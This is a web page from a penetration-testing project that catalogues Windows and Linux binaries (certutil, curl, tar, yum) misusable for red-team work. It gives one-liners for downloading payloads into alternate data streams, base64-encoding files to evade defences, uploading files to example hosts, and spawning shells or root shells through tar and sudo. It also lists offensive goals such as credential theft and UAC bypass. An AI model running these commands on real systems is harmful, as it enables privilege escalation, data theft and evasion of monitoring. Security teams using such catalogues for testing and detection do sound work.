The goal of the CHDB project is to document every binary, script, and library that can be helpful for penetration testing
(Red Team).
id | OS | Command | Privileges | Function | Protocol | type | Notes |
---|---|---|---|---|---|---|---|
id | OS | Command | Privileges | Function | Protocol | type | Notes |
1 | Windows | certutil.exe | User | Download, ADS, Encode, Decode | HTTP, HTTPS | binary | Download certutil.exe -urlcache -split -f http://example.com/file_name file_name Download file and save it in an NTFS Alternate Data Stream (ADS) certutil.exe -urlcache -split -f http://example.com/file_name.ps1 c:temp:file_name Test: powershell -ep bypass - < c:temp:file_name Find: dir /s /r | find ":$DATA" Encode (Base64) files to evade defensive measures certutil -encode InputFileName EncodedOutputFileName Decode (Base64) file certutil -decode File_Encoded File_Decoded Description certutil - dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains. Path C:WindowsSystem32certutil.exe, C:\WindowsSysWOW64certutil.exe Protocol HTTP, HTTPS OS-Version 7, 8, 10 |
2 | Windows | curl | User | Download, Upload | HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER | binary | Download curl http://example.com/file_name -o file_name Upload curl -F 'file=@file_to_send' http://example.com/upload/ Description curl - is a tool to transfer data from or to a server. Path C:WindowsSystem32curl.exe Protocol HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER OS-Version 10 |
3 | Linux | curl | User | Download, Upload | HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER | binary | Download curl http://example.com/file_name -o file_name Upload curl -F 'file=@file_to_send' http://example.com/upload/ Description curl - is a tool to transfer data from or to a server. Path /usr/bin/curl, /usr/local/bin/curl Protocol HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER OS-Version - |
4 | Linux | tar | User, Sudo | Shell, Download, Upload, Read, Write, Sudo | SSH | Binary | Shell Break out from restricted environments tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"' (GNU tar only) Download Download and extract a tar archive via SSH (GNU tar only). RHOST=example.com Upload Create tar archive and send it via SSH to a remote location (GNU tar only). RHOST=example.com * rmt utility is required on the attacker box for download or upload (rmt provides remote access to files and devices for tar). Read It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system (GNU tar only). LFILE=file_to_read Write It writes data to files, it may be used to do privileged writes or write files outside a restricted file system (GNU tar only). LFILE=file_to_write Sudo If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh Description tar - an archiving utility Path /bin/tar, /usr/local/bin/tar Protocol SSH OS-Version - |
5 | Linux | yum | User, Sudo | Shell, Download, Sudo | HTTP, HTTPS | Binary | Download yum install http://example.com/file_to_get.rpm Sudo Spawn interactive root shell by loading a custom plugin. TF=$(mktemp -d) cat >$TF/y.conf<<EOF cat >$TF/y.py<<EOF sudo yum -c $TF/x --enableplugin=y Description yum - Yellowdog Updater Modified Path /usr/bin/yum Protocol HTTP, HTTPS OS-Version - |
Windows
- Microsoft-signed (native to the OS or downloaded from Microsoft).
- Executing code (Arbitrary code, Pass-through execution of other programs (unsigned) or scripts)
- File operations (Download, Upload, Copy, Encode, Decode, …)
- User Account Control (UAC) Bypass
- Credential theft
- Log Evasion & Obfuscation
- DLL Sideloading and Hijacking
- Dumping process memory
- Compiling code
Linux
- Break Out (restricted shells)
- Reverse Shells
- Privilege Escalation (SUID, SGID, Sticky Bits)
- File operations (Download, Upload, Copy, Encode, Decode, …)
- Facilitate the other post-exploitation tasks
- Log Evasion & Obfuscation
- Dumping process memory
- Compiling code
Disclaimer
Use this only for research purposes and ethical hacking, do not break any laws by exploiting weaknesses of companies!